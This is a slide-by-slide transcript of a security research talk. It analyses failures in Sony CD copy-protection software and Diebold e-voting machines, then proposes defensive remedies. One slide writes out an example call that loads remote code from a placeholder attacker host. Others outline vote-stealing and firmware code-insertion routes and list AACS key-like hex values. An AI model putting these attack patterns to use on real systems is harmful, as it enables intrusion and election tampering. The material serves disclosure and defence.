Presentation on theme: "Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman."— Presentation transcript:
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman
2 CD DRM 2003, 2005 SDMI 2001 CSS 1999 AACS 2007 Diebold 2003, 2006 What’s the common “thread”?
J. Alex Halderman3 Nontraditional Environments Problem Platform Package
J. Alex Halderman4 Security IntuitionSecurity Intuition Breakdown Underestimate Similarity Underestimate Difference Underestimate Risk
J. Alex Halderman5 Spectacular Failures Cascading Irreparable Collateral damage
J. Alex Halderman6 Nontraditional Environments Intuition Breakdowns Spectacular Failures
J. Alex Halderman7 Disaster Investigation
J. Alex Halderman8 Questions What about these environments makes failures especially severe? Are there patterns to the design and implementation mistakes behind them? Where are such failures likely to occur in the future? What tools and techniques can we use to prevent them?
J. Alex Halderman9 Outline 1. A Model for Security Failures 2. Failures in CD-DRM Systems 3. Failures in E-Voting Systems 4. Predicting Future Disasters 5. Remedies and Defensive Strategies
J. Alex Halderman10 CD DRM 2001 1 st Generation:Passive protection 2003 2 nd Generation:Active protection 2005 3 rd Generation:Weak passive + Aggressive active [H02] [H03] [HF05]
J. Alex Halderman11 Nontraditional Problem Restrict use (Untrusted device) Compatibility (Legacy format) All DRM: No known solution provides traditional security guarantees
J. Alex Halderman12 Nontraditional Package Drivers Ripper/copier Application Protection driver Normal CD OS Protection driver Autorun # CD Marked “Protected” Audio CDHybrid CD
J. Alex Halderman13 A Spectacular Failure Failure in depth Installer → Patch → Uninstaller Mass exposure Millions of computers vulnerable Difficult repairs Most users unaware they’re at risk High costs Lawsuits, recalls, lost sales
J. Alex Halderman14 SunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs First4Internet
J. Alex Halderman15 Rootkit Magic prefix: $sys$ Files Processes Registry keys Hidden DRM challenge: Users will remove protection driver Vendor response: Install a rootkit to hide it [HF06]
J. Alex Halderman16 Rootkit Exploits in wild Backdoor.Ryknos.B Trojan.Welomoch DRM challenge: Users will remove protection driver Vendor response: Install a rootkit to hide it Attack: Privilege escalation Mistake: Hides arbitrary objects $sys$virus.exe [HF06]
J. Alex Halderman17 Installer DRM challenge: Users will decline to install software Vendor response: Install regardless of consent Attack: Privilege escalation Mistake: Incorrect permissions 13+ MB installed before EULA screen Everyone: Full Control Runs with administrator privileges next time CD is inserted
J. Alex Halderman18 Installer DRM challenge: Users will decline to install software Vendor response: Install regardless of consent Attack: Privilege escalation Mistake: Incorrect permissions Sony releases patch…but, patch calls potentially booby trapped code [HF06] How do users know they need to patch? Vulnerable even if refused installation
J. Alex Halderman19 Uninstallers DRM challenge: Angry customers demand removal Vendor response: Offer uninstallers, but limit access “HTTP GET /XCP.dat” Web page calls ActiveX control CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”) Server sony-bmg.com XCP.dat Client CodeSupport.ocx Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp() 2. 3. 4. User obtains single-use code for uninstallation web page 1. [HF06]
J. Alex Halderman20 Control accepts arbitrary URL Remote code not authenticated Control not removed after use Uninstallers DRM challenge: Angry customers demand removal Vendor response: Offer uninstallers, but limit access Attack: Remote code execution Mistakes: “HTTP GET /XCP.dat” Server sony-bmg.com XCP.dat Client CodeSupport.ocx Rookie mistakes Victim visits attacker’s web page CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”) 1. 2. Client executes code from Evil.dat with user’s privileges 3. “HTTP GET /Evil.dat” Server attacker.com Evil.dat “Oops!... I did it again” [HF06]
J. Alex Halderman21 Environmental Effects Technology phase change Risks appear unexpectedly DRM problem → inherent conflict Deliberately subvert control of PC Lack of transparency Problems more difficult to detect Conflicting incentives Choose risky DRM over user security Politics
J. Alex Halderman22 Intuition Breakdown Nearly all parties underestimated security risks: Vendors Sony Users Experts “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse President, Sony BMG Global Digital Business Vendors Sony Users Experts Destroyed by rookie security mistakes Didn’t know music CDs could hurt them Didn’t discover rootkit for six months
J. Alex Halderman23 Outline 1. A Model for Security Failures 2. Failures in CD-DRM Systems 3. Failures in E-Voting Systems 4. Predicting Future Disasters 5. Remedies and Defensive Strategies
J. Alex Halderman24 Diebold DREs
J. Alex Halderman25 Nontraditional Package
J. Alex Halderman26 Nontraditional Platform
J. Alex Halderman27 Nontraditional Problem Paperless DREs: No known solution provides traditional security guarantees Voting… Securely Secretly Accessibly Quickly Cheaply
J. Alex Halderman28 A Spectacular Failure Failures in depth Code insertion routes, physical security Mass exposure Millions of votes at risk Difficult repairs Some attacks not patchable High costs Many states likely to replace machines
J. Alex Halderman29 Inserting Code Bootloader WinCE Kernel BallotStation FBOOT.NB0 Bootloader NK.BIN WinCE Kernel INSTALL.INS BallotStation (Internal Flash or EPROM) (Internal Flash) [FHF07] EXPLORER.GLB
J. Alex Halderman30 Inserting Code WinCE Kernel BallotStation Bootloader (Flash) [FHF07] Failure in Depth: Boot into Explorer Insecure firmware updater ROM replacement
J. Alex Halderman31 [FHF07] Stealing Votes WinCE Kernel BallotStationStuffer
J. Alex Halderman32 [FHF07] Stealing Votes Kernel BallotStation Primary Vote RecordBackup Vote Record Audit Log Primary Vote RecordBackup Vote Record Audit Log Stuffer
J. Alex Halderman33 Viral Propagation [FHF07] Reboot
J. Alex Halderman34 [FHF07]
J. Alex Halderman35 Physical Security [FHF07]
J. Alex Halderman36 Physical Security Failure in Depth: Same key used everywhere Widely available Secret disclosed on web site Lock easy to pick [FHF07]
J. Alex Halderman37 Environmental Effects Technology phase change Risks appear unexpectedly Difficulty of the problem Confusing threat model, circular reasoning Lack of transparency Basic errors persist for years Security treated as a PR problem Conflicting incentives Officials choose efficiency over security Politics
J. Alex Halderman38 Intuition Breakdown Nearly all parties underestimated security risks: Vendor Officials Experts Vendor Officials Experts Planned security by obscurity Vastly underinvested in security design Many surprised by severity of problems Underestimated similarity to PCs Didn’t understand threat model CAs Lacked institutional competence to see risks
J. Alex Halderman39 Outline 1. A Model for Security Failures 2. Failures in CD-DRM Systems 3. Failures in E-Voting Systems 4. Predicting Future Disasters 5. Remedies and Defensive Strategies
J. Alex Halderman40 Learning from Failures My Past Work CD DRM E-Voting Related Work Past Voting Studies CSS, SDMI, HDCP, DTV WEP, GSM, RFID Work in Progress AACS Other voting systems Future Work (Predicted failures)
J. Alex Halderman41 AACS [Work in progress] Title KeyVolume KeyProcessing KeyDevice Key February 11 February 24 January 13 January 12 Title KeyVolume KeyProcessing KeyDevice Key Potential disaster (analyze game theory) Solid crypto, Rookie coding errors Revokable Arms Race Interesting lessons on incentives, politics, law DRM as nontraditional security problem 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bd 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 be 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bf ? 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c1 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c2 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c3
J. Alex Halderman42 Other Voting Systems [Work in progress]
J. Alex Halderman43 Predicting Failures Nontraditional Environment + Technology Phase Change +
J. Alex Halderman44 Future Failures?
J. Alex Halderman45 Future Failures?
J. Alex Halderman46 Future Failures?
J. Alex Halderman47 Future Failures?
J. Alex Halderman48 Outline 1. A Model for Security Failures 2. Failures in CD-DRM Systems 3. Failures in E-Voting Systems 4. Predicting Future Disasters 5. Remedies and Defensive Strategies
J. Alex Halderman49 Defensive Approach New IntuitionsNew TechnologiesNew Policies
J. Alex Halderman50 General Lessons Security disasters occur where security research isn’t involved New intuitions, partnerships, transparency Problems that resist rigorous security analysis are prone to major failures Research ways to transform problems Failures have higher externalities where producer and user incentives misalign Where appropriate, add liability
J. Alex Halderman51 Remedies: DRM New intuition DRM as a risk to client security New policies Mandatory transparency (DMCA reform, installation disclosure) Liability for aggressive, dangerous techniques (change maker incentives)
J. Alex Halderman52 Remedies: E-Voting New intuitions Voting machines and PCs share vulnerabilities No software should be trusted to count votes New policies Improved transparency, certification processes Liability for insecurity: fix at vendor’s cost? (change maker incentives) Software independence
J. Alex Halderman53 New Technologies [CHF07] Machine-assisted auditing 1. Initial count (untrusted) 2. Recount machine commits to each ballot Ballo t 3. Humans check sample by hand
J. Alex Halderman54 C := H(…) New Technologies [HW07] Harvested verifiable challenges 1. Collect fresh data from varied sources 2. Hash data to form “challenge” 3. Anyone can verify challenge was valid ?
J. Alex Halderman55 Contributions 1. New model for security failures Analysis of past failures from the literature Predictions for future failures Policy implications 2. Analysis of failures in DRM systems Inherent limitations of CD copy protection [H03,H04] Client security failures from Sony CD DRM [HF06] Coming AACS arms race* 3. Analysis of failures in e-voting systems Diebold AccuVote TS and TSx [FHF07] AVC Advantage* 4. Technological remedies Machine-assisted election auditing [CHF07] Harvesting verifiable challenges [HW07] Privacy management for mobile devices [HWF05]
J. Alex Halderman56 References H03 J. A. Halderman. “Evaluating New Copy-Prevention Techniques for Audio CDs.” DRM 2002. H04 J. A. Halderman. “Analysis of the MediaMax CD3 Copy-Prevention System.” 2003. HWF04 J. A. Halderman, B. Waters, and E. Felten. “Privacy Management for Portable Recording Devices.” WPES 2004. HF06 J. A. Halderman and E. Felten. “Lessons from the Sony CD DRM Episode.” USENIX Security 2006. FHF07 A. Feldman, J. A. Halderman, and E. Felten. “Security Analysis of the Diebold AccuVote-TS Voting Machine.” In submission, 2007. CHF07 J. Calandrino, J. A. Halderman, and E. Felten. “Machine-Assisted Election Auditing.” In submission, 2007. HW07 J. A. Halderman and B. Waters. “Harvesting Verifiable Challenges from Oblivious Online Sources.” In submission, 2007.
Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman